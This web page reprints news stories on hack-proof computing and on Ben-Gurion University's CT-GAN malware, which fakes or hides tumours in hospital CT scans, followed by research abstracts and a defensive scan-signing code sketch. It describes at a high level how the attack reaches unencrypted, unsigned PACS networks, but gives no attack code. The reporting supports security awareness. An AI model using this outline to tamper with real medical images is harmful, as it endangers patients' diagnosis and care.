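assert combine(shares[:3]) != b"payment instruction #4711"  # 3 of 4 tell you nothing
```

This is also where Cohen’s arithmetic comes from: if breaching one network succeeds with probability 0.01, breaching four independent networks succeeds with probability 0.01⁴ = 10⁻⁸, or 0.000001%.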

Check Point also collaborates with large multinational technology firms in a data-sharing alliance in the belief that co-operation is key to staying one step ahead of the hackers.

But while such approaches show promise, Check Point’s Neatsun Ziv concludes that: “There is no such thing as an unhackable computer, the only thing that exists is the gap between what you build and what people know how to hack today.”

There is always a trade-off between usability and security. The more secure and hack-proof a computer is, the less practical it is in a networked world.

“Yes, we can build an unhackable computer… but it would be like a tank with so many shields that it wouldn’t move anywhere,” says Morphisec’s Mr Danieli.

The concern for the cyber-security industry is that as the nascent “internet of things” develops, powered by 5G mobile connectivity, the risk of cyber-attack will only increase.

And as artificial intelligence becomes more widespread, it will become just another tool hackers can exploit.

The arms race continues.

Source: BBC News

Computer virus alters cancer scan images

A computer virus that can add fake tumours to medical scan images has been created by cyber-security researchers.

The experimental malware could add fake tumours and other signs of disease to scans

In laboratory tests, the malware altered 70 images and managed to fool three radiologists into believing patients had cancer.

The altered images also managed to trick automated screening systems.

The team from Israel developed the malicious software to show how easy it is to get around security protections for diagnostic equipment.

The program was able to convincingly add fake malignant growths to images of lungs taken by MRI and CT scanning machines.

The researchers, from Ben Gurion University’s cyber-security centre, said the malware could also remove actual malignant growths from image files, to prevent patients who are targets from getting the care they need.

The images targeted were scans of lungs but the malware could be tuned to produce other fake conditions such as brain tumours, blood clots, fractures or spinal problems, according to the Washington Post, which first reported on the research.

Images and scans were vulnerable, said the researchers, because the files were generally not digitally signed or encrypted. This means any changes would be hard to spot.

The researchers suggested the security flaws could be exploited to sow doubt about the health of government figures, sabotage research, commit insurance fraud or as part of a terrorist attack.

In addition, they said, weaknesses in the way hospitals and health care centres protect their networks could give attackers easy access.

While hospitals were careful about sharing sensitive data beyond their boundaries, they took much less care when handling data internally, said one of the researchers.

“What happens within the hospital system itself, which no regular person should have access to in general, they tend to be pretty lenient about,” Yisroel Mirsky told the Washington Post.

Better use of encryption and digital signatures could help hospitals avoid problems if cyber-attackers tried to subvert images, he added.

Hospitals and other healthcare organisations have been a popular target for cyber-attackers and many have been hit by malicious ransomware that encrypts files and only returns the data when victims pay up.

The NHS was hit hard in 2017 by the WannaCry ransomware, which left many hospitals scrambling to recover data.

Source: BBC News

Hospital viruses: Fake cancerous nodes in CT scans, created by malware, trick radiologists

Researchers in Israel created malware to draw attention to serious security weaknesses in medical imaging equipment and networks.


When Hillary Clinton stumbled and coughed through public appearances during her 2016 presidential run, she faced critics who said that she might not be well enough to perform the top job in the country. To quell rumors about her medical condition, her doctor revealed that a CT scan of her lungs showed that she just had pneumonia.

But what if the scan had shown faked cancerous nodules, placed there by malware exploiting vulnerabilities in widely used CT and MRI scanning equipment? Researchers in Israel say they have developed such malware to draw attention to serious security weaknesses in critical medical imaging equipment used for diagnosing conditions and the networks that transmit those images — vulnerabilities that could have potentially life-altering consequences if unaddressed.

The malware they created would let attackers automatically add realistic, malignant-seeming growths to CT or MRI scans before radiologists and doctors examine them. Or it could remove real cancerous nodules and lesions without detection, leading to misdiagnosis and possibly a failure to treat patients who need critical and timely care.

Yisroel Mirsky, Yuval Elovici and two others at the Ben-Gurion University Cyber Security Research Center in Israel who created the malware say that attackers could target a presidential candidate or other politicians to trick them into believing they have a serious illness and cause them to withdraw from a race to seek treatment.

The research isn’t theoretical. In a blind study the researchers conducted involving real CT lung scans, 70 of which were altered by their malware, they were able to trick three skilled radiologists into misdiagnosing conditions nearly every time. In the case of scans with fabricated cancerous nodules, the radiologists diagnosed cancer 99 percent of the time. In cases where the malware removed real cancerous nodules from scans, the radiologists said those patients were healthy 94 percent of the time.

Even after the radiologists were told that the scans had been altered by malware and were given a second set of 20 scans, half of which were modified, they still were tricked into believing the scans with fake nodules were real 60 percent of the time, leading them to misdiagnoses involving those patients. In the case of scans where the malware removed cancerous nodules, doctors did not detect this 87 percent of the time, concluding that very sick patients were healthy.

The researchers ran their test against a lung-cancer screening software tool that radiologists often use to confirm their diagnoses and were able to trick it into misdiagnosing the scans with false tumors every time.

“I was quite shocked,” said Nancy Boniel, a radiologist in Canada who participated in the study. “I felt like the carpet was pulled out from under me, and I was left without the tools necessary to move forward.”

The study focused on lung cancer scans only. But the attack would work for brain tumors, heart disease, blood clots, spinal injuries, bone fractures, ligament injuries and arthritis, Mirsky said.

Attackers could choose to modify random scans to create chaos and mistrust in hospital equipment, or they could target specific patients, searching for scans tagged with a specific patient’s name or ID number. In doing this, they could prevent patients who have a disease from receiving critical care or cause others who aren’t ill to receive unwarranted biopsies, tests and treatment. The attackers could even alter follow-up scans after treatment begins to falsely show tumors spreading or shrinking. Or they could alter scans for patients in drug and medical research trials to sabotage the results.

The vulnerabilities that would allow someone to alter scans reside in the equipment and networks hospitals use to transmit and store CT and MRI images. These images are sent to radiology workstations and back-end databases through what’s known as a picture archiving and communication system (PACS). Mirsky said the attack works because hospitals don’t digitally sign the scans to prevent them from being altered without detection and don’t use encryption on their PACS networks, allowing an intruder on the network to see the scans and alter them.

“They’re very, very careful about privacy … if data is being shared with other hospitals or other doctors,” Mirsky said, “because there are very strict rules about privacy and medical records. But what happens within the [hospital] system itself, which no regular person should have access to in general, they tend to be pretty lenient [about]. It’s not … that they don’t care. It’s just that their priorities are set elsewhere.”

Although one hospital network they examined in Israel did try to use encryption on its PACS network, the hospital configured the encryption incorrectly and as a result the images were still not encrypted.

Fotios Chantzis, a principal information-security engineer with the Mayo Clinic in Minnesota who did not participate in the study but confirmed that the attack is possible, said that PACS networks are generally not encrypted. That’s in part because many hospitals still operate under the assumption that what’s on their internal network is inaccessible from outside — even though “the era where the local hospital network was a safe, walled garden is long gone,” he said.

Although encryption is available for some PACS software now, it’s still generally not used, for compatibility reasons: the software has to communicate with older systems that don’t have the ability to decrypt or re-encrypt images.

To develop their malware, the Israeli researchers used machine learning to train their code to rapidly assess scans passing through a PACS network and to adjust and scale fabricated tumors to conform to a patient’s unique anatomy and dimensions to make them more realistic. The entire attack can be fully automated so that once the malware is installed on a hospital’s PACS network, it will operate independently of the researchers to find and alter scans, even searching for a specific patient’s name.

To get the malware onto a PACS network, attackers would need either physical access to the network — to connect a malicious device directly to the network cables — or they could plant malware remotely from the Internet. The researchers found that many PACS networks are either directly connected to the Internet or accessible through hospital machines that are connected to the Internet.

To see how easy it would be to physically install malware on a PACS network, Mirsky conducted a test at a hospital in Israel that the researchers videotaped. He was able to enter the radiology department after hours and connect his malicious device to the network in just 30 seconds, without anyone questioning his presence. Although the hospital had given permission for the test, staff members didn’t know how or when Mirsky planned to carry it out.

To prevent someone from altering CT and MRI scans, Mirsky says, ideally hospitals would enable end-to-end encryption across their PACS network and digitally sign all images while also making sure that radiology and doctor workstations are set up to verify those signatures and flag any images that aren’t properly signed.
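A minimal sketch of that sign-and-verify step, using Ed25519 from Python’s `cryptography` package, is below. The key handling and the stand-in scan bytes are our assumptions; a real deployment would integrate signing into the DICOM/PACS workflow and keep keys in hardware.

```python
# Sketch of signing scans at acquisition and verifying them before display
# (our illustration; DICOM/PACS integration and key management are omitted).
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# In practice the scanner holds the private key; every radiology workstation
# holds the public key and flags any image whose signature fails to verify.
scanner_key = Ed25519PrivateKey.generate()
verify_key = scanner_key.public_key()

scan = b"...raw CT slice bytes..."       # stand-in for a DICOM file
signature = scanner_key.sign(scan)       # attached when the scan is taken

tampered = scan.replace(b"CT", b"XX")    # a CT-GAN-style modification
try:
    verify_key.verify(signature, tampered)
except InvalidSignature:
    print("ALERT: scan was modified after acquisition")
```

Without such signatures, and without encryption on the PACS links, an intruder on the network can rewrite scans with no one the wiser, which is exactly the gap the researchers exploited.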

Suzanne Schwartz, a medical doctor and the Food and Drug Administration’s associate director for Science and Strategic Partnerships, who has been leading some of the FDA’s efforts to secure medical devices and equipment, expressed concern about the findings of the Israeli researchers. But she said many hospitals don’t have the money to invest in more secure equipment, or they have 20-year-old infrastructure that doesn’t support newer technologies.

“It’s going to require changes that go well beyond devices, but changes with regards to the network infrastructure,” Schwartz said. “This is where engaging and involving with other authorities and trying to bring the entire community together becomes really important.”

Christian Dameff, an emergency room physician with the University of California at San Diego School of Medicine and a security researcher who has exposed vulnerabilities in the 911 emergency calling system, notes that in the case of a cancer diagnosis, some backstops would prevent a patient from receiving unwarranted treatment based only on a maliciously modified CT scan. But that doesn’t mean the attack would be harmless.

“There are a couple of steps before we just take someone to surgery” or prescribe radiation and chemotherapy, Dameff said. “But there is still harm to the patient regardless. There is the emotional distress [from learning you may have cancer], and there are all sorts of insurance implications.”

The radiologists in the BGU study recommended follow-up treatment and referrals to a specialist for all of the patients with scans that showed cancerous lung nodules. They recommended immediate tissue biopsies or other surgery for at least a third of them.

Correction: This story has been updated to reflect that the hospital in Israel didn’t encrypt any data passed over its network. An earlier version of the story said it had encrypted the metadata for the scans, which contains a patient’s name and medical ID.

Source: The Washington Post

About Us

Cyber@BGU is an umbrella organization at Ben Gurion University, home to a variety of applied research activities in cyber security, big data analytics and AI. Residing in a newly established R&D center at the new hi-tech park of Beer Sheva (Israel’s Cyber Capital), Cyber@BGU serves as a platform for the most innovative and technologically challenging projects with various industrial and governmental partners.

Latest Publications

Deployment Optimization of IoT Devices through Attack Graph Analysis

Noga Agmon, Asaf Shabtai, Rami Puzis

Department of Software and Information Systems Engineering, Ben-Gurion University of the Negev, 11 Apr 2019

The Internet of things (IoT) has become an integral part of our life at both work and home. However, these IoT devices are prone to vulnerability exploits due to their low cost, low resources, the diversity of vendors, and proprietary firmware. Moreover, short range communication protocols (e.g., Bluetooth or ZigBee) open additional opportunities for the lateral movement of an attacker within an organization. Thus, the type and location of IoT devices may significantly change the level of network security of the organizational network. In this paper, we quantify the level of network security based on an augmented attack graph analysis that accounts for the physical location of IoT devices and their communication capabilities. We use the depth-first branch and bound (DFBnB) heuristic search algorithm to solve two optimization problems: Full Deployment with Minimal Risk (FDMR) and Maximal Utility without Risk Deterioration (MURD). An admissible heuristic is proposed to accelerate the search. The proposed method is evaluated using a real network with simulated deployment of IoT devices. The results demonstrate (1) the contribution of the augmented attack graphs to quantifying the impact of IoT devices deployed within the organization on security, and (2) the effectiveness of the optimized IoT deployment.


CT-GAN: Malicious Tampering of 3D Medical Imagery using Deep Learning

Yisroel Mirsky, Tom Mahler, Ilan Shelef, Yuval Elovici

Department of Information Systems Engineering, Ben-Gurion University, Israel; Soroka University Medical Center. 3 Apr 2019

In 2018, clinics and hospitals were hit with numerous attacks leading to significant data breaches and interruptions in medical services. An attacker with access to medical records can do much more than hold the data for ransom or sell it on the black market.

In this paper, we show how an attacker can use deep learning to add or remove evidence of medical conditions from volumetric (3D) medical scans. An attacker may perform this act in order to stop a political candidate, sabotage research, commit insurance fraud, perform an act of terrorism, or even commit murder. We implement the attack using a 3D conditional GAN and show how the framework (CT-GAN) can be automated. Although the body is complex and 3D medical scans are very large, CT-GAN achieves realistic results which can be executed in milliseconds.

To evaluate the attack, we focused on injecting and removing lung cancer from CT scans. We show how three expert radiologists and a state-of-the-art deep learning AI are highly susceptible to the attack. We also explore the attack surface of a modern radiology network and demonstrate one attack vector: we intercepted and manipulated CT scans in an active hospital network with a covert penetration test.


Analysis of Location Data Leakage in the Internet Traffic of Android-based Mobile Devices

Nir Sivan, Ron Bitton, Asaf Shabtai

Department of Software and Information Systems Engineering, Ben-Gurion University of the Negev. 12 Dec 2018

In recent years we have witnessed a shift towards personalized, context-based applications and services for mobile device users. A key component of many of these services is the ability to infer the current location and predict the future location of users based on location sensors embedded in the devices. Such knowledge enables service providers to present relevant and timely offers to their users and better manage traffic congestion control, thus increasing customer satisfaction and engagement. However, such services suffer from location data leakage which has become one of today’s most concerning privacy issues for smartphone users.

BGU researchers focused specifically on location data that is exposed by Android applications via Internet network traffic in plaintext (i.e., without encryption) without the user’s awareness. An empirical evaluation, involving the network traffic of real mobile device users, aimed at: (1) measuring the extent of location data leakage in the Internet traffic of Android-based smartphone devices; and (2) understanding the value of this data by inferring users’ points of interests (POIs).

The key findings of this research center on the extent of this phenomenon in terms of both ubiquity and severity.


Incentivized Delivery Network of IoT Software Updates Based on Trustless Proof-of-Distribution

Oded Leiba, Yechiav Yitzchak, Ron Bitton, Asaf Nadler, Asaf Shabtai

IEEE Security & Privacy on the Blockchain (IEEE S&B), an IEEE European Symposium on Security & Privacy affiliated workshop, 23 April 2018, University College London (UCL), London, UK

The Internet of Things (IoT) network of connected devices currently contains more than 11 billion devices and is estimated to double in size within the next four years. The prevalence of these devices makes them an ideal target for attackers. To reduce the risk of attacks, vendors routinely deliver security updates (patches) for their devices. The delivery of security updates becomes challenging due to the issue of scalability, as the number of devices may grow much quicker than vendors’ distribution systems. Previous studies have suggested a permissionless and decentralized blockchain-based network in which nodes can host and deliver security updates, so that the addition of new nodes scales out the network. However, these studies do not provide an incentive for nodes to join the network, making it unlikely for nodes to freely contribute their hosting space, bandwidth, and computation resources.
In this paper, we propose a novel decentralized IoT software update delivery network in which participating nodes (referred to as distributors) are compensated by vendors with digital currency for delivering updates to devices. Upon the release of a new security update, a vendor will make a commitment to provide digital currency to distributors that deliver the update; the commitment will be made with the use of smart contracts, and hence will be public, binding, and irreversible. The smart contract promises compensation to any distributor that provides proof-of-distribution, which is unforgeable proof that a single update was delivered to a single device. A distributor acquires the proof-of-distribution by exchanging a security update for a device signature using the Zero-Knowledge Contingent Payment (ZKCP) trustless data exchange protocol. Eliminating the need for trust between the security update distributor and the security consumer (IoT device) by providing fair compensation, can significantly increase the number of distributors, thus facilitating rapid scale out.

